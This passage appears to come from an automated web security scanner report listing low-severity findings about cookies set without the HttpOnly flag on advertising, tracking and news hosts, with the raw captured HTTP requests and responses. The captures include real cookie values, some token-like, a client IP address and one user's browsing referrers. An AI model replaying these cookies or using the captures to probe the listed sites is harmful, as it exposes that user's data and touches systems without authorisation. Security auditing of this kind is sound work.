Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 29842

lpConnLib.Process({"ResultSet": {"lpCallId":"137591478182-9251743555","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.net
...[SNIP]...

10.94. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313323**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scottrade.wsod.com
Path:   /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313323**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313323**;10,3,183;1920;1200;http%3A_@2F_@2Fwww.scottrade.com_@2Fonline-trading.html_@3Fcid%3DAM%7C46%7C1542%7C1206%7C131_@26rid%3DL%7C1736690_@26amvid%3DOPT_OUT_@26symbol%3DSPY HTTP/1.1
Host: scottrade.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading.html?cid=AM|46|1542|1206|131&rid=L|1736690&amvid=OPT_OUT&symbol=SPY
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ub=OPT_OUT

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 12:48:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_8=10:37:190:18:0:50961:1315313325:B2|10:37:191:18:0:50961:1315313324:B2; expires=Fri, 07-Oct-2011 12:48:45 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 841

   function cmsOOB37190() {
       var ioob = new Image();
       ioob.onload = function() {}
       var rand = Math.random() + "";
           rand = rand * 10000;
       ioob.src = '//scottrade.wsod.com/click/5f7eefdbd0f4af885fc2
...[SNIP]...

10.95. http://scottrade.wsod.com/embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313352**

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scottrade.wsod.com
Path:   /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313352**

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/5f7eefdbd0f4af885fc291827f23e4b0/37.0.js.302x255/1315313352**;10,3,183;1920;1200;http%3A_@2F_@2Fwww.scottrade.com_@2Fonline-trading_@2Ffund-your-account.html HTTP/1.1
Host: scottrade.wsod.com
Proxy-Connection: keep-alive
Referer: http://www.scottrade.com/online-trading/fund-your-account.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ub=OPT_OUT; u=4e6616acaf0c5; f8=258981:et:8:ETF:07:4:; i_8=10:37:191:18:0:50961:1315313324:B2

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 06 Sep 2011 12:49:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_8=10:37:190:18:0:50961:1315313355:B2|10:37:190:18:0:50961:1315313354:B2|10:37:191:18:0:50961:1315313324:B2; expires=Fri, 07-Oct-2011 12:49:15 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 787

   function cmsOOB37190() {
       var ioob = new Image();
       ioob.onload = function() {}
       var rand = Math.random() + "";
           rand = rand * 10000;
       ioob.src = '//scottrade.wsod.com/click/5f7eefdbd0f4af885fc2
...[SNIP]...

10.96. http://sdc.usps.com/dcs731qdj000004f27giixw3q_2i4w/dcs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sdc.usps.com
Path:   /dcs731qdj000004f27giixw3q_2i4w/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcs731qdj000004f27giixw3q_2i4w/dcs.gif?&dcsdat=1315331587325&dcssip=postcalc.usps.gov&dcsuri=/&WT.tz=-5&WT.bh=12&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Postage%20Price%20Calculator&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=750x400&WT.fv=10.3&WT.slv=Unknown&WT.tv=9.3.0&WT.dl=0&WT.ssl=0&WT.es=postcalc.usps.gov/&WT.vt_f_a=2&WT.vt_f=2 HTTP/1.1
Host: sdc.usps.com
Proxy-Connection: keep-alive
Referer: http://postcalc.usps.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_w6-ted_80=ffffffff3b22bffa45525d5f4f58455e445a4a421548; WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331579861:ss=1315331559860; ACOOKIE=C8ctADU2LjAuNzAuNi0zNjkwOTA1OTIwLjMwMTc0MzU1AAAAAAAAAAAAAAABAAAAAwAAAKsXZk6XF2ZOAQAAAAEAAACrF2ZOlxdmTgEAAAADAAAAHTU2LjAuNzAuNi0zNjkwOTA1OTIwLjMwMTc0MzU1

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Wed, 07 Mar 2007 17:00:42 GMT
Accept-Ranges: bytes
ETag: "0599d23da60c71:ac9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADU2LjAuNzAuNi0zNjkwOTA1OTIwLjMwMTc0MzU1AAAAAAAAAAAAAAACAAAAAwAAAKsXZk6XF2ZOFAAAALMXZk6zF2ZOAQAAAAEAAACzF2ZOlxdmTgEAAAADAAAAHTU2LjAuNzAuNi0zNjkwOTA1OTIwLjMwMTc0MzU1; path=/; expires=Thu, 06-Oct-2011 12:53:07 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Tue, 06 Sep 2011 12:53:06 GMT
Connection: close

GIF89a.............!.......,...........D..;

10.97. http://sdc.usps.com/dcsq8lc5w10000sxojnpk5m85_1i5u/dcs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sdc.usps.com
Path:   /dcsq8lc5w10000sxojnpk5m85_1i5u/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsq8lc5w10000sxojnpk5m85_1i5u/dcs.gif?&dcsdat=1315331559857&dcssip=zip4.usps.com&dcsuri=/zip4/welcome.jsp&dcsref=http://www.fairpoint.com/&WT.co_f=56.0.70.6-3690905920.30174355&WT.vtid=56.0.70.6-3690905920.30174355&WT.vtvs=1315331559860&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=12&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=USPS%20-%20ZIP%20Code%20Lookup%20-%20Search%20By%20Address&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1266x909&WT.fv=10.3&WT.slv=Unknown&WT.tv=8.6.2&WT.dl=0&WT.ssl=0&WT.es=zip4.usps.com/zip4/welcome.jsp&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1
Host: sdc.usps.com
Proxy-Connection: keep-alive
Referer: http://zip4.usps.com/zip4/welcome.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NSC_w6-ted_80=ffffffff3b22bffa45525d5f4f58455e445a4a421548; WT_FPC=id=56.0.70.6-3690905920.30174355:lv=1315331559860:ss=1315331559860

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Wed, 07 Mar 2007 17:00:42 GMT
Accept-Ranges: bytes
ETag: "0599d23da60c71:ac9"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADU2LjAuNzAuNi0zNjkwOTA1OTIwLjMwMTc0MzU1AAAAAAAAAAAAAAABAAAAAwAAAJcXZk6XF2ZOAQAAAAEAAACXF2ZOlxdmTgAAAAA-; path=/; expires=Thu, 06-Oct-2011 12:52:39 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Tue, 06 Sep 2011 12:52:39 GMT
Connection: close

GIF89a.............!.......,...........D..;

10.98. http://sensor2.suitesmart.com/sensor4.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sensor2.suitesmart.com
Path:   /sensor4.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sensor4.js?GID=15493;CRE=;PLA=;ADI=; HTTP/1.1
Host: sensor2.suitesmart.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: G15740=C1S104345-1-0-0-0-1314814746-0; spass=a1bfb027540676fe37eda0dd3047b05c

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:50 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: G15493=C1S99917-2-0-0-0-1315313090-0; path=/; domain=.suitesmart.com; expires=Sun, 04-Mar-2012 12:44:50 GMT
Pragma: no-cache
Cache-control: no-cache
P3P: CP="ALL DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" , policyref="http://www.suitesmart.com/privacy/p3p/policy.p3p"
Connection: close
Content-Type: text/html
Expires: Tue, 06 Sep 2011 12:44:50 GMT
Content-Length: 376

<!--
var serviceFlag = typeof(serviceFlag) == "undefined" ? false:serviceFlag;
var swCtrl = false;
var snote = 'Sorry SAM';
if (typeof(RunService) == "undefined"){
RunService = new Function();
S
...[SNIP]...

10.99. http://sports.yahoo.com/mlb/recap

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sports.yahoo.com
Path:   /mlb/recap

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mlb/recap;_ylt=AiqN_12mg5CSzn6lUavzCZ85nYcB?gid=310905122 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; MwPhCom_degraded_status=false; adxid=016e3b4e6615bdb5; YWP_VOLUME=0.5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160; spt_site=scorethin_league=nascar

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:50:19 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Set-Cookie: MwPhCom_degraded_status=false; path=/
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 2
Proxy-Connection: keep-alive
Via: HTTP/1.1 r4.ycpi.s1s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 247599

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>

<head>
<title>Lee tosses another gem, shuts out Braves - MLB - Yahoo! Sports</title>
<meta http-e
...[SNIP]...

10.100. http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sports.yahoo.com
Path:   /nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443 HTTP/1.1
Host: sports.yahoo.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:41 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Host,Accept-Encoding
Set-Cookie: MwPhCom_degraded_status=false; path=/
Content-Type: text/html;charset=utf-8
Cache-Control: private
Age: 6
Proxy-Connection: keep-alive
Via: HTTP/1.1 r1.ycpi.s1s.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ])
Server: YTS/1.19.5
Content-Length: 291643

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Tiki Barber remains unemployed and sad - Shutdown Corner - NFL&nbsp;Blog - Yahoo! Spor
...[SNIP]...

10.101. http://testdm.travelers.com/trvwics.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://testdm.travelers.com
Path:   /trvwics.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trvwics.gif?TraceAgent=IMP&ad_id=222372080&siteAlias=332867993 HTTP/1.1
Host: testdm.travelers.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/TR1/iview/332867993/direct/01?time=1315313115&click=http://ads.bluelithium.com/clk?3,eAGlkEtvm0AUhf9MV5XLzDAzDAmaxfBweBhjHBybbCweDg7ggoHIpr--qK6t7ns255Ou7rm6B2EtQ.SDoYMCP57QQWW5hrCMDxlVkIpmUNM0mamEyQRBONt5G1PYxtIR-tlpN-KmrnXDvyiEL5w7QyFCYRqu8jX5H3lJf71P.8.N3H0cmg4Wt7Ria89XpaM.sk3rEkfhZSnHZLENSWDGgx.Na9-AJD754yLKyHuUV370dlq-LCv.sSj47DgM7TMARd2kSS0lXS6NybFppKw5gVfnhSN6VoqirA.A50xlKsYSIiqEmLAJ6CQZTYAYIzIDJu.bpht68MplqihElemzv7YMsB.rgYvyTTlXaZ.1QWevrzT2gvgTQvozznQQ81jYQQCs3YojjCiWIYYULHjWtNf91nNWFmvFui2jWrqUoav6x5wlFT3Nc0sYi.0voPN4311FrpvrsfgB3FvMlAUpQ1h9YsDjnZpcdtmmcu0yTT9x-D6mWRMCwRVCCcIErDkE37.da7l9808lvwEx7qgw,
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ad_guid_imp=ef62eaf6-2da3-4346-8fe2-c70fb482c03a~TraceAgent=IMP&ad_id=222372080&siteAlias=332867993&~09/05/2011 03:44.28.962 PM EDT; redUmbrella=BD27701E6D77E3FB7CEC6F2728F9B165C580796943B8785C1738755EA976ADED3F9E774C

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, max-age=0
Content-Type: image/gif
Expires: Thu, 01 Dec 1994 16:00:00 GMT
P3P: CP="NON ADM DEV TAI PSA PSD IVA OUR IND UNI COM NAV STA"
Pragma: no-cache
Set-Cookie: ad_guid_imp=7ffd757b-6447-4d98-ae3d-054ef9348332~TraceAgent=IMP&ad_id=222372080&siteAlias=332867993&~09/06/2011 08:45.29.491 AM EDT; Domain=.travelers.com; Expires=Wed, 5-Sep-12 12:45:29 GMT; Path=/
Content-Length: 43
Connection: keep-alive

GIF89a.............!.......,...........D..;

10.102. http://thesearchagency.net/pixspike.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thesearchagency.net
Path:   /pixspike.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixspike.php?tsatime=1315327921958&uref=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dtelephone+service&ckwid=go000000516757112s_business_telephone_service&pageQs=utm_source%3Dgoogle%26utm_medium%3Dppc%26utm_term%3Dbusiness_telephone_service%26utm_campaign%3Dphones_business%26refcd%3DGO000000516757112s_business_telephone_service%26tsacr%3DGO7010955737%26_kk%3De5cfc5b1-4c17-4425-8b78-9c87aae9c019%26_kt%3D7010955737%26gclid%3DCMqnsqPHiKsCFRM2gwodbCP53A&siteid=784&wayid=6025&tsa1v784=uvid54f3722f72cf13ba4e964afc25de508921958&tsa1s784=usid54f3722f72cf13ba4e964afc25de508921958 HTTP/1.1
Host: thesearchagency.net
Proxy-Connection: keep-alive
Referer: http://www.aptela.com/lp2011/T2V1/?utm_source=google&utm_medium=ppc&utm_term=business_telephone_service&utm_campaign=phones_business&refcd=GO000000516757112s_business_telephone_service&tsacr=GO7010955737&_kk=e5cfc5b1-4c17-4425-8b78-9c87aae9c019&_kt=7010955737&gclid=CMqnsqPHiKsCFRM2gwodbCP53A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tsav438=uvid8f5717129fa0c9b859c3a2e4b98f21d828519

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:02 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.0-8+etch16 proxy_html/2.5 mod_ssl/2.2.3 OpenSSL/0.9.8c
X-Powered-By: PHP/5.2.0-8+etch16
Set-Cookie: tsas784=usid54f3722f72cf13ba4e964afc25de508921958; path=/; domain=.thesearchagency.net
Set-Cookie: tsav784=uvid54f3722f72cf13ba4e964afc25de508921958; expires=Mon, 02-Jun-2014 11:52:02 GMT; path=/; domain=.thesearchagency.net
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR UNRa IND UNI COM NAV INT STA PRE"
Expires: Thu, 19 Aug 1993 21:00:00 GMT
Cache-Control: no-store
Pragma: no-cache
Accept-Ranges: bytes
Content-Length: 67
Connection: close
Content-Type: image/gif

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

10.103. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.056024663150310516/0/in%2Cti/ti.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.056024663150310516/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.056024663150310516/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

10.104. http://tr.adinterax.com/re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.7168486232403666/0/in%2Cti/ti.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.7168486232403666/0/in%2Cti/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CSapientTest%2FYahoo_IM%2FYAHOO_143_B2C_Mail_IM_Expandable_954x60_AdInterax%2CC%3DMail%2CP%3DYahoo%2CK%3D3078081/0.7168486232403666/0/in%2Cti/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:46 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

10.105. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Fantasy_Football_2_SportsFix_072711%2CC%3DUMU%2CP%3DYahoo%2CK%3D1620020/0.8961339080706239/0/ti.0%2Cai.0/ti.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CUMU_Yahoo_Fantasy_Football_2_SportsFix_072711%2CC%3DUMU%2CP%3DYahoo%2CK%3D1620020/0.8961339080706239/0/ti.0%2Cai.0/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CUMU_Yahoo_Fantasy_Football_2_SportsFix_072711%2CC%3DUMU%2CP%3DYahoo%2CK%3D1620020/0.8961339080706239/0/ti.0%2Cai.0/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://sports.yahoo.com/nfl/blog/shutdown_corner/post/Tiki-Barber-remains-unemployed-and-sad?urn=nfl-wp6443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:44:58 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: adxf=696749@1@221.3078081@1@223.1620020@1@223; expires=Thu, 31 Dec 2015 00:00:00 GMT; domain=.adinterax.com; path=/
Cache-Control: no-cache, private
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Length: 1

0

10.106. http://tr.adinterax.com/re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.18778627226129174/0/ti.0%2Cai.0/ti.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tr.adinterax.com
Path:   /re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.18778627226129174/0/ti.0%2Cai.0/ti.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /re/yahoohouse%2CUMU_Yahoo_Movies_TransparentPurple_070611%2CC%3DUMU%2CP%3DYahoo%2CK%3D1071929/0.18778627226129174/0/ti.0%2Cai.0/ti.gif HTTP/1.1
Host: tr.adinterax.com
Proxy-Connection: keep-alive
Referer: http://movies.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=01345f4e62cacd40; adxf=696749@1@221.3078081@1@223.1620020@1@223.2481772@1@223

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:35 GMT
